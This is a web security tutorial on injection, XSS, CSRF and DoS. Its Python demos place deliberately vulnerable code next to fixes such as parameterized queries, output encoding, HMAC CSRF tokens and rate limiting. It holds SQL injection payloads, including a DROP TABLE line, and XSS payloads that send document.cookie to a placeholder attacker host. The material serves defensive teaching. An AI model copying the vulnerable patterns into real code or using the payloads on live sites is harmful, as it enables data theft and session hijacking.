Web Security

From a security perspective there are many aspects of a web application to consider beyond using HTTPS. HTTPS provides transport layer security, that is, confidentiality and integrity of data in transit, but it does nothing about flaws in the application itself. There are many tools which test a running application (dynamic testing, often as part of a penetration test) or scan its source code (static analysis) and report possible vulnerabilities.

The Open Web Application Security Project (in short referred to as OWASP) is a not-for-profit organization focused on improving the security of software. Among other resources it publishes the OWASP Top 10, a regularly updated list of the most common web application vulnerabilities together with guidance on preventing each.

Following is a list of some of the common attacks which generally need to be considered.

1. Injection Attacks

Injection attacks involve crafting the input to an application so that part of the input is interpreted as code or as a command rather than as data. In a SQL injection attack, for instance, the attacker embeds SQL syntax in an input value that the application concatenates into a query; the resulting query may return sensitive data the user should not see or perform harmful operations such as deleting data or dropping tables/databases. The same class of flaw exists for JSON/NoSQL databases: if attacker-controlled JSON is merged into a query document, the attacker can inject query operators and change what the query matches.

Illustration:

A simple SQL injection attack could be tried by modifying the input so that it closes the quoted value in the query and appends SQL of the attacker's choosing, for example a condition that is true for every row.

Solution:

The primary defense against injection is to never build queries by concatenating untrusted input: use parameterized queries (prepared statements), or an ORM or query builder that binds values separately from the statement text, so that the input can only ever be treated as data. Validating input against an allow-list of expected patterns (for example, an account number must be digits only) is a useful second layer, but pattern-based sanitization on its own is easily bypassed and should not be the only control.
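The following is an added example (not code from the original page) that shows the attack and the fix side by side in Python: a query built by string concatenation, the same lookup done with a parameterized query, and two classic payloads run against an in-memory SQLite table with constructed sample rows.

```python
"""Added example (not from the original page): SQL injection against a
string-built query versus a parameterized query, run against an in-memory
SQLite database with constructed sample data."""
import sqlite3


def make_db():
    """Constructed sample data: a tiny users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn, username):
    """Deliberately vulnerable: the untrusted value is concatenated into the
    SQL text, so a quote in the input changes the structure of the query."""
    query = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, username):
    """Parameterized: the driver sends the value separately from the SQL text,
    so it is always treated as a string to compare against, never as SQL."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def demo():
    """Run the tautology payload through both functions and return how many
    rows each leaks: the vulnerable query returns every user, the safe one none
    (no user is literally named "' OR '1'='1")."""
    conn = make_db()
    payload = "' OR '1'='1"
    # Vulnerable SQL becomes: ... WHERE username = '' OR '1'='1'
    leaked = find_user_vulnerable(conn, payload)
    safe = find_user_safe(conn, payload)
    return len(leaked), len(safe)


if __name__ == "__main__":
    print("rows returned (vulnerable, parameterized):", demo())
    conn = make_db()
    # Comment payload: everything after -- is ignored, so the closing quote is
    # never reached and the attacker selects exactly the account they name.
    print(find_user_vulnerable(conn, "alice' --"))
    print(find_user_safe(conn, "alice' --"))
```

The sqlite3 module refuses to run more than one statement per `execute` call, which blocks stacked payloads such as `'; DROP TABLE users; --` here; many other drivers and databases do allow them, so that is a property of this driver, not a defense to rely on.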

2. XSS Attacks

Also known as Cross Site Scripting attacks, in this type of attack the attacker exploits an application which renders user-supplied input into its web pages without encoding it for the context in which it is displayed. For example, an attacker provides a malicious script as his/her profile description on a website (say a social networking site), and the website stores it and later redisplays it verbatim. When another user visits the attacker's profile, the script is included in the page and run by that user's browser in the security context of the site. Such a script can read the user's session cookie or other sensitive information and transfer it to the attacker's site, or perform actions on the site as that user.

Solution:

The primary defense against XSS is output encoding: every untrusted value is escaped for the context it is inserted into (HTML body, HTML attribute, JavaScript, URL) at the point where the page is generated; modern template engines do this by default when auto-escaping is enabled. Validating input against an allow-listed set of characters helps as a second layer, but trying to detect and strip "script" from input is unreliable, because there are many ways to execute JavaScript in HTML that do not use a script tag at all. A Content-Security-Policy header further limits what an injected script could do if one does get through.
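As an added example (not code from the original page), the Python below renders an attacker-controlled profile value four ways: pasted straight into HTML, after a naive "strip the script tag" filter, and HTML-encoded for the body and for an attribute context. The payloads are constructed for the demo and the `attacker.example` host is a placeholder.

```python
"""Added example (not from the original page): rendering untrusted profile
text with and without output encoding, and why a 'strip the script tag'
filter is not a substitute. All payloads are constructed for the demo."""
import html

# Constructed attacker-supplied profile values.
PAYLOAD_SCRIPT = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
PAYLOAD_NESTED = "<scr<script>ipt>alert(document.cookie)</script>"
PAYLOAD_EVENT = '<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">'
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.cookie)'


def render_bio_vulnerable(bio):
    """Deliberately vulnerable: untrusted text is pasted straight into HTML."""
    return '<div class="bio">' + bio + "</div>"


def render_display_name_vulnerable(name):
    """Deliberately vulnerable: untrusted text inside an attribute value."""
    return '<input name="display_name" value="' + name + '">'


def strip_script_tags(bio):
    """A naive 'validate against script inputs' filter. Kept here only to show
    that it is bypassed by nested tags and by event-handler attributes."""
    return bio.replace("<script>", "").replace("</script>", "")


def render_bio_encoded(bio):
    """HTML-body context: html.escape turns <, >, & and quotes into entities, so
    the browser displays the text literally instead of parsing it as markup."""
    return '<div class="bio">' + html.escape(bio) + "</div>"


def render_display_name_encoded(name):
    """HTML-attribute context: quote=True (the default) also encodes " and ',
    so the value cannot close the attribute and add an event handler."""
    return '<input name="display_name" value="' + html.escape(name, quote=True) + '">'


def contains_live_markup(rendered):
    """Rough check used by the demo: is there still a raw tag or event-handler
    attribute that a browser would act on?"""
    return "<script>" in rendered or "<img " in rendered or ' onfocus="' in rendered


def demo():
    """True means the rendered page still carries executable markup."""
    return {
        "vulnerable_body": contains_live_markup(render_bio_vulnerable(PAYLOAD_SCRIPT)),
        "vulnerable_attr": contains_live_markup(render_display_name_vulnerable(PAYLOAD_ATTR)),
        # The filter happens to catch the plain <script> payload ...
        "naive_filter_vs_script": contains_live_markup(
            render_bio_vulnerable(strip_script_tags(PAYLOAD_SCRIPT))),
        # ... but one pass of replace() reassembles <scr<script>ipt> into <script> ...
        "naive_filter_vs_nested": contains_live_markup(
            render_bio_vulnerable(strip_script_tags(PAYLOAD_NESTED))),
        # ... and does nothing about an onerror handler.
        "naive_filter_vs_event": contains_live_markup(
            render_bio_vulnerable(strip_script_tags(PAYLOAD_EVENT))),
        "encoded_body": contains_live_markup(render_bio_encoded(PAYLOAD_EVENT)),
        "encoded_attr": contains_live_markup(render_display_name_encoded(PAYLOAD_ATTR)),
    }


if __name__ == "__main__":
    for case, live in demo().items():
        print(f"{case:24s} executable markup present: {live}")
```

The encoded variants are safe for the HTML body and attribute contexts only; a value placed inside a `<script>` block or a URL needs the encoding for that context instead, which is why template engines with context-aware auto-escaping are preferable to hand-built escaping.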

3. XSRF Attacks

Also known as Cross Site Request Forgery attacks (more commonly abbreviated CSRF), in this type of attack the attacker tricks a logged-in user's browser into sending a request to a site without the user's knowledge, and the site carries it out because the browser automatically attaches the user's session cookie. The forged operation may or may not benefit the attacker directly, but it is performed in the user's name and could harm the user or damage his/her reputation.

For example, let's say a user is logged in to a shopping cart application. The attacker advertises some deals related to that shop on his own website and tricks the user into visiting it. The attacker's page contains a hidden form (or JavaScript) that submits to the same endpoint the shopping cart application's own pages use, but with values the attacker has chosen. Since the user is already logged in, possibly in another tab of the browser, the browser sends the user's session cookie along with the forged request and the submission succeeds. The attacker could thereby place a new order, change the delivery address to his own address, etc. The attacker's page cannot read the response (the same-origin policy prevents that); the attack works because the request itself has side effects.

Solution:

The standard solution to CSRF is an anti-CSRF token: the server embeds an unpredictable, per-session (and usually time limited) random value or signature in each form or page, the client submits it with every state-changing request, and the server rejects any request whose token is missing or does not match. The attacker's page cannot obtain the token because it cannot read the victim's pages. Setting the session cookie with the SameSite attribute (Lax or Strict), so that the browser does not send it on cross-site requests, adds a second layer of protection in modern browsers.
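The following is an added example (not code from the original page) of such a token in Python: an HMAC over the session id and an issue timestamp, verified with a constant-time comparison and an expiry check, plus a hypothetical request handler that rejects submissions without it. `SERVER_SECRET`, `TOKEN_TTL` and `handle_change_address` are illustrative assumptions, not the API of any particular framework.

```python
"""Added example (not from the original page): an HMAC-signed, time-limited
anti-CSRF token bound to the user's session, and a hypothetical handler that
rejects forged submissions. SERVER_SECRET, TOKEN_TTL and the handler are
assumptions for the demo, not the API of any framework."""
import base64
import hashlib
import hmac
import secrets
import time

SERVER_SECRET = secrets.token_bytes(32)   # assumption: generated once at startup, kept private
TOKEN_TTL = 600                            # seconds a token stays valid


def _mac(session_id, issued_at):
    """HMAC-SHA256 over the session id and issue time under the server secret."""
    msg = f"{session_id}:{issued_at}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()


def issue_csrf_token(session_id, now=None):
    """Token to embed in the form as a hidden field: "<issued_at>.<base64 mac>".
    It is bound to the session and its issue time, so it cannot be replayed
    from another session or after TOKEN_TTL seconds."""
    issued_at = int(time.time() if now is None else now)
    mac_b64 = base64.urlsafe_b64encode(_mac(session_id, issued_at)).decode().rstrip("=")
    return f"{issued_at}.{mac_b64}"


def verify_csrf_token(session_id, token, now=None):
    """True only for a well-formed, unexpired token whose MAC matches this
    session. The MAC comparison is constant-time."""
    try:
        ts_str, mac_b64 = token.split(".", 1)
        issued_at = int(ts_str)
    except (AttributeError, ValueError):
        return False
    current = int(time.time() if now is None else now)
    if current - issued_at > TOKEN_TTL or issued_at > current + 60:
        return False        # expired, or implausibly issued in the future
    try:
        got = base64.urlsafe_b64decode(mac_b64 + "=" * (-len(mac_b64) % 4))
    except ValueError:      # binascii.Error is a subclass of ValueError
        return False
    return hmac.compare_digest(_mac(session_id, issued_at), got)


def handle_change_address(session_id, form):
    """Hypothetical handler for a state-changing POST. session_id comes from the
    cookie the browser attaches automatically; the token must come from the form
    body, which a cross-site page cannot read and therefore cannot supply."""
    token = form.get("csrf_token")
    if token is None or not verify_csrf_token(session_id, token):
        return 403, "rejected: missing or invalid CSRF token"
    return 200, f"delivery address updated to {form['address']}"


if __name__ == "__main__":
    sid = "sess-0a1b"                       # constructed session id
    token = issue_csrf_token(sid)
    print(handle_change_address(sid, {"address": "1 Attacker St"}))            # forged: 403
    print(handle_change_address(sid, {"csrf_token": token, "address": "1 Main St"}))  # 200
```

Because the token is derived from the session id it need not be stored server-side, but it must never be placed in a cookie or a GET URL, and the secret must be shared by every application instance that verifies tokens.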

4. Denial of Service Attacks

Denial of Service attacks (in short DoS attacks) involve flooding a server with a huge number of automated requests until it is overloaded and stops serving legitimate users. A variant known as a Distributed Denial of Service attack (DDoS) sends the requests from many distributed machines, each with its own IP address (often a botnet), which makes it hard for the target to tell attack traffic from legitimate traffic and to block it by source address.

In a cloud based environment a denial of service attack may instead trigger scaling of the infrastructure (if it is configured for auto scaling), so that the service stays up but the organization incurs huge, unplanned costs.

Solution:

Mitigation is usually a mix of measures: per-client rate limiting and connection limits in the application or reverse proxy, a web application firewall, and commercial DDoS protection services (CDN or scrubbing providers) that absorb and filter attack traffic before it reaches the server. Auto scaling policies should also have upper bounds and cost alerts so that an attack cannot run up an unbounded bill.
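As an added example (not code from the original page), the Python below implements a per-IP sliding-window rate limiter and runs two constructed floods through it: one from a single address, which is throttled, and one of the same size spread over a thousand addresses, which passes untouched. This is exactly the limitation of per-source blocking against DDoS described above. The limits, addresses and traffic are assumptions for the demo.

```python
"""Added example (not from the original page): a per-client sliding-window
rate limiter, and why it throttles a single-source flood but not a distributed
one. Request traffic and addresses are constructed for the demo."""
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most max_requests per client within any window_seconds span."""

    def __init__(self, max_requests, window_seconds):
        self.max_requests = max_requests
        self.window = window_seconds
        self.history = defaultdict(deque)   # client -> timestamps of admitted requests

    def allow(self, client, now):
        """Record the request at time `now` and return True if it is admitted."""
        q = self.history[client]
        while q and now - q[0] >= self.window:
            q.popleft()                     # drop requests that fell out of the window
        if len(q) >= self.max_requests:
            return False
        q.append(now)
        return True


def simulate(limiter, requests):
    """Feed (timestamp, client) pairs through the limiter; return (allowed, blocked)."""
    allowed = blocked = 0
    for ts, client in requests:
        if limiter.allow(client, ts):
            allowed += 1
        else:
            blocked += 1
    return allowed, blocked


def single_source_flood(n=1000, ip="203.0.113.7"):
    """Constructed: n requests in one second, all from one address."""
    return [(i * 0.001, ip) for i in range(n)]


def distributed_flood(n=1000):
    """Constructed: the same n requests in one second, each from a different
    (documentation-range style) address, as a botnet would produce."""
    return [(i * 0.001, f"10.{(i >> 16) & 255}.{(i >> 8) & 255}.{i & 255}") for i in range(n)]


def compare_floods(max_per_second=100):
    """Run both floods against a fresh 100-requests-per-second-per-IP limiter."""
    return {
        "single_source": simulate(SlidingWindowLimiter(max_per_second, 1.0), single_source_flood()),
        "distributed": simulate(SlidingWindowLimiter(max_per_second, 1.0), distributed_flood()),
    }


if __name__ == "__main__":
    for name, (ok, dropped) in compare_floods().items():
        print(f"{name:14s} allowed={ok:5d} blocked={dropped:5d}")
```

Per-client limits are still worth having (they stop the easy single-source case and abusive individual clients), but for a distributed flood the signal has to come from aggregate load, request signatures or an upstream scrubbing service, which is why the measures above are combined rather than used alone.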
